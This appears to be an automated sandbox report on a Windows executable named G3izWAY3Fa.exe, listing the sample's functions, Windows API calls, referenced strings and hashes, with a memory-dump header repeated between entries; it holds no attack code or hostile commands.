Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Windows\temp
API String ID: 123533781-823764690
Opcode ID: 2dd538ee9b8a3d7f9f3516468ec66178ea648c363e8e90f8139c66e2dda502c8
Instruction ID: ce0b4858a9f81ea3ddc308d80d774a06bef6b406c5dcff46aa6a4b0d76e862c7
Opcode Fuzzy Hash: 2dd538ee9b8a3d7f9f3516468ec66178ea648c363e8e90f8139c66e2dda502c8
Instruction Fuzzy Hash: AE418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54

Function 00405CD8 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(?,004224C8,00421880,004055F4,00421880,00421880,00000000,00421880,00421880,?,?,00000000,00405316,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 00405CE3
FindClose.KERNEL32(00000000), ref: 00405CEF

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
Instruction ID: 9a18407f5d3c0b203e51d924b64f4f6f4a008a27543408caa796c3d3b713bef8
Opcode Fuzzy Hash: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
Instruction Fuzzy Hash: 91D0C93594D620ABD6012728AD0884B6A589B153317508B32F46AE22E0C7748C529AA9

Function 0040263E Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: f3d53191a6114d87a635ba583fb771baa2153c083736da5485a901926fc49706
Instruction ID: 14dcf34609860af9969e045d3f077fc7a18bb2554c958aa599433bfc977b1d94
Opcode Fuzzy Hash: f3d53191a6114d87a635ba583fb771baa2153c083736da5485a901926fc49706
Instruction Fuzzy Hash: 86F0E572A04101DFD700EBB49E49AEEB778DF51328FA0067BF101F20C1D2B84A45DB2A

Function 004038BC Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038F8
ShowWindow.USER32(?), ref: 00403915
DestroyWindow.USER32 ref: 00403929
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403945
GetDlgItem.USER32(?,?), ref: 00403966
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 0040397A
IsWindowEnabled.USER32(00000000), ref: 00403981
GetDlgItem.USER32(?,00000001), ref: 00403A2F
GetDlgItem.USER32(?,00000002), ref: 00403A39
SetClassLongA.USER32(?,000000F2,?), ref: 00403A53
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403AA4
GetDlgItem.USER32(?,00000003), ref: 00403B4A
ShowWindow.USER32(00000000,?), ref: 00403B6B
EnableWindow.USER32(?,?), ref: 00403B7D
EnableWindow.USER32(?,?), ref: 00403B98
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403BAE
EnableMenuItem.USER32(00000000), ref: 00403BB5
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403BCD
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BE0
lstrlenA.KERNEL32(00420478,?,00420478,00423680), ref: 00403C09
SetWindowTextA.USER32(?,00420478), ref: 00403C18
ShowWindow.USER32(?,0000000A), ref: 00403D4C

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: d8b962e911b7c253e61e73d21e88cb3add85ad3b5a8fe6332aee3bd0e594c397
Instruction ID: 874aaf0cc80a4ada72e8b6aceb9d73cb056a569e4b675a7f159d56e4bf17f1bf
Opcode Fuzzy Hash: d8b962e911b7c253e61e73d21e88cb3add85ad3b5a8fe6332aee3bd0e594c397
Instruction Fuzzy Hash: F9C18E71A04204BBDB206F21ED85E2B3E7CEB05746F40453EF641B52F1C779AA429B2E

Function 00403ED7 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F62
GetDlgItem.USER32(00000000,000003E8), ref: 00403F76
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403F94
GetSysColor.USER32(?), ref: 00403FA5
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FB4
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FC3
lstrlenA.KERNEL32(?), ref: 00403FCD
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FDB
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403FEA
GetDlgItem.USER32(?,0000040A), ref: 0040404D
SendMessageA.USER32(00000000), ref: 00404050
GetDlgItem.USER32(?,000003E8), ref: 0040407B
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040BB
LoadCursorA.USER32(00000000,00007F02), ref: 004040CA
SetCursor.USER32(00000000), ref: 004040D3
ShellExecuteA.SHELL32(0000070B,open, .B,00000000,00000000,00000001), ref: 004040E6
LoadCursorA.USER32(00000000,00007F00), ref: 004040F3
SetCursor.USER32(00000000), ref: 004040F6
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404122
SendMessageA.USER32(00000010,00000000,00000000), ref: 00404136

Strings

open, xrefs: 004040DE
.B, xrefs: 004040DB
N, xrefs: 00404069

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: .B$N$open
API String ID: 3615053054-847860968
Opcode ID: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
Instruction ID: 4310844e4bc5412d85e0e67e924f78a0a7df87fdbfd2fc52009ff806257c2229
Opcode Fuzzy Hash: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
Instruction Fuzzy Hash: 3161A1B1A40209BFEB109F60DC45F6A7B69EB54715F108036FB05BA2D1C7B8E951CF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00423680,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
Instruction ID: 87972a138d556bacb88ba9c7fcdf6f47da3ec758f00315b8b39b68d2b09e4b9a
Opcode Fuzzy Hash: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
Instruction Fuzzy Hash: 6441BC71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C378EA54DFA5

Function 0040572B Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004054C0,?,00000000,000000F1,?), ref: 00405778
GetShortPathNameA.KERNEL32(?,00422608,00000400), ref: 00405781
GetShortPathNameA.KERNEL32(00000000,00422080,00000400), ref: 0040579E
wsprintfA.USER32 ref: 004057BC
GetFileSize.KERNEL32(00000000,00000000,00422080,C0000000,00000004,00422080,?,?,?,00000000,000000F1,?), ref: 004057F7
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405806
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040581C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421C80,00000000,-0000000A,00409330,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405862
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405874
GlobalFree.KERNEL32(00000000), ref: 0040587B
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405882

Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660

Strings

[Rename], xrefs: 0040582C, 0040583E
%s=%s, xrefs: 004057B2

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$[Rename]
API String ID: 3772915668-1727408572
Opcode ID: 07c12176a5373c156f7b76f79e2b8e53ec089a42cccabde25e202c2098703b15
Instruction ID: 243778ea09c2d6121d89995a0746b628a30f71b2b4e684d8516dd3187c24d480
Opcode Fuzzy Hash: 07c12176a5373c156f7b76f79e2b8e53ec089a42cccabde25e202c2098703b15
Instruction Fuzzy Hash: 0E412032A05B067BE3207B619C48F6B3A5CEB40754F004436FD05F62D2EA38A8018ABE

Function 00405C3F Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
CharPrevA.USER32(?,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9

Strings

*?|<>/":, xrefs: 00405C87
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C40, 00405C7B
"C:\Users\user\Desktop\G3izWAY3Fa.exe", xrefs: 00405C45

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1663183005
Opcode ID: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
Instruction ID: 6e21827f4117d195ccc2fee92ee9dbca2865e9be55a4e6ca6148cbd3e4a13511
Opcode Fuzzy Hash: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
Instruction Fuzzy Hash: F011905580CB942AFB3206384C48B776F99CB67764F58407BE8C4723C2D67C5C429B6D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00403E13
GetSysColor.USER32(00000000), ref: 00403E2F
SetTextColor.GDI32(?,00000000), ref: 00403E3B
SetBkMode.GDI32(?,?), ref: 00403E47
GetSysColor.USER32(?), ref: 00403E5A
SetBkColor.GDI32(?,?), ref: 00403E6A
DeleteObject.GDI32(?), ref: 00403E84
CreateBrushIndirect.GDI32(?), ref: 00403E8E

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction ID: 6c7fdd900eb09a88ca35fb2207b5deae9db7ec429e3ae93f4f07cdddb38981b8
Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction Fuzzy Hash: 1F219671904744ABCB219F78DD08B4B7FF8AF00715F048A2AF856E22E1C338EA04CB95

Function 0040267C Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
GlobalFree.KERNEL32(?), ref: 00402725
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
GlobalFree.KERNEL32(00000000), ref: 0040273E
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 6c70dd5e24678078cb6415e9c6392547dd21b53fc970282deceed51b45fe2952
Instruction ID: 12be5ee7c0a04460072f4a22dab7179149aa53ae67e7a866020ad89d1ba75591
Opcode Fuzzy Hash: 6c70dd5e24678078cb6415e9c6392547dd21b53fc970282deceed51b45fe2952
Instruction Fuzzy Hash: 5831C071C00128BBDF216FA5CD88EAE7E79EF04368F10423AF524762E0C7795D419BA8

Function 00404D7B Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: aa11647610f970b6d5c89beb7753eaef7f091513a46ac0765cbf1dd94c7bd241
Instruction ID: 7f48be0438031ac4014e4461c76190d89e96d247d5b12388d0b77bfdc4e74ae1
Opcode Fuzzy Hash: aa11647610f970b6d5c89beb7753eaef7f091513a46ac0765cbf1dd94c7bd241
Instruction Fuzzy Hash: 09216DB1E00158BBDB119FA5CD84ADEBFB9FF45354F14807AFA04B6290C7398A419B98

Function 0040464A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404665
GetMessagePos.USER32 ref: 0040466D
ScreenToClient.USER32(?,?), ref: 00404687
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404699
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004046BF

Strings

f, xrefs: 0040469B

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

